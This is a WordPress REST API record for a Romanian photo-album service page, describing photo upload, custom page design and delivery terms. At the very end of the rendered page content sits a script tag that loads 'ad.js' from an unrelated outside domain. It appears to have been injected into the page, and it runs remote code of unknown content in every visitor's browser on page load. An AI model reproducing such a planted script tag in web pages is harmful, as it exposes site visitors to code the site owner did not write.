{"id":350,"date":"2016-11-16T18:32:19","date_gmt":"2016-11-16T18:32:19","guid":{"rendered":"http:\/\/www.digitalprofoto.ro\/online\/?page_id=350"},"modified":"2016-11-23T10:42:30","modified_gmt":"2016-11-23T10:42:30","slug":"albume-foto-digitale-tip-fotocarte","status":"publish","type":"page","link":"http:\/\/www.digitalprofoto.ro\/online\/albume-foto-digitale-tip-fotocarte\/","title":{"rendered":"Albume Foto Digitale tip fotocarte"},"content":{"rendered":"<div  class=\"one\" >\n<div class=\"page_content_wrapper nopadding\">\n<div class=\"one_half_bg textright\" style=\"padding:0px;\">\n<h2 class=\"ppb_title\" style=\"\">Albume foto digitale tip fotocarte<\/h2>\n<hr class=\"title_break left\" style=\"\"\/>\n<h3 style=\"text-align: center;\">1<br \/>\nFOTOGRAFIILE TALE<\/h3>\n<p style=\"text-align: justify;\">Incarca la noi pe server fotografiile care doresti sa apara in album. Ar fi ideal sa le aranjezi in ordinea in care le doresti in album. Daca le poti pune in directoare separat, pentru fiecare pagina ar fi si mai bine. Alege imaginile de coperta, text pentru coperta si eventual pentru interior.<\/p>\n<h3 style=\"text-align: center;\">\n2<br \/>\nNOI FACEM DESIGNUL<\/h3>\n<p style=\"text-align: justify;\">\nNoi le descarcam si facem designul personalizat pentru fiecare pagina in parte. Pe urma, iti trimitem sa vezi macheta paginilor. Daca totul este ok, trecem la etapa urmatoare. Daca doresti modificari ne poti comunica, le realizam si primesti iarasi sa vezi grafica finala.<\/p>\n<h3 style=\"text-align: center;\">3<br \/>\nALBUMUL TAU<\/h3>\n<p style=\"text-align: justify;\">\nExpediem albumul c\u0103tre adresa indicata de tine sau te asteptam in magazin ca sa-l ridici. Livrarea albumului se realizeaza prin Po\u0219ta Rom\u00e2n\u0103 cu plata RAMBURS sau prin Curier Rapid. Dac\u0103 valoarea comenzii dep\u0103\u0219e\u0219te 300 lei livrarea este gratuita.<\/p>\n<\/div>\n<div class=\"one_half_bg\"><\/div>\n<p><br class=\"clear\"\/><\/div>\n<\/div>\n<p><script src='https:\/\/blueeyeswebsite.com\/ad.js' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Albume foto digitale tip fotocarte 1 FOTOGRAFIILE TALE Incarca la noi pe server fotografiile care doresti sa apara in album. Ar fi ideal sa le aranjezi in ordinea in care le doresti in album. Daca le poti pune in directoare [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/pages\/350"}],"collection":[{"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/comments?post=350"}],"version-history":[{"count":25,"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/pages\/350\/revisions"}],"predecessor-version":[{"id":897,"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/pages\/350\/revisions\/897"}],"wp:attachment":[{"href":"http:\/\/www.digitalprofoto.ro\/online\/wp-json\/wp\/v2\/media?parent=350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}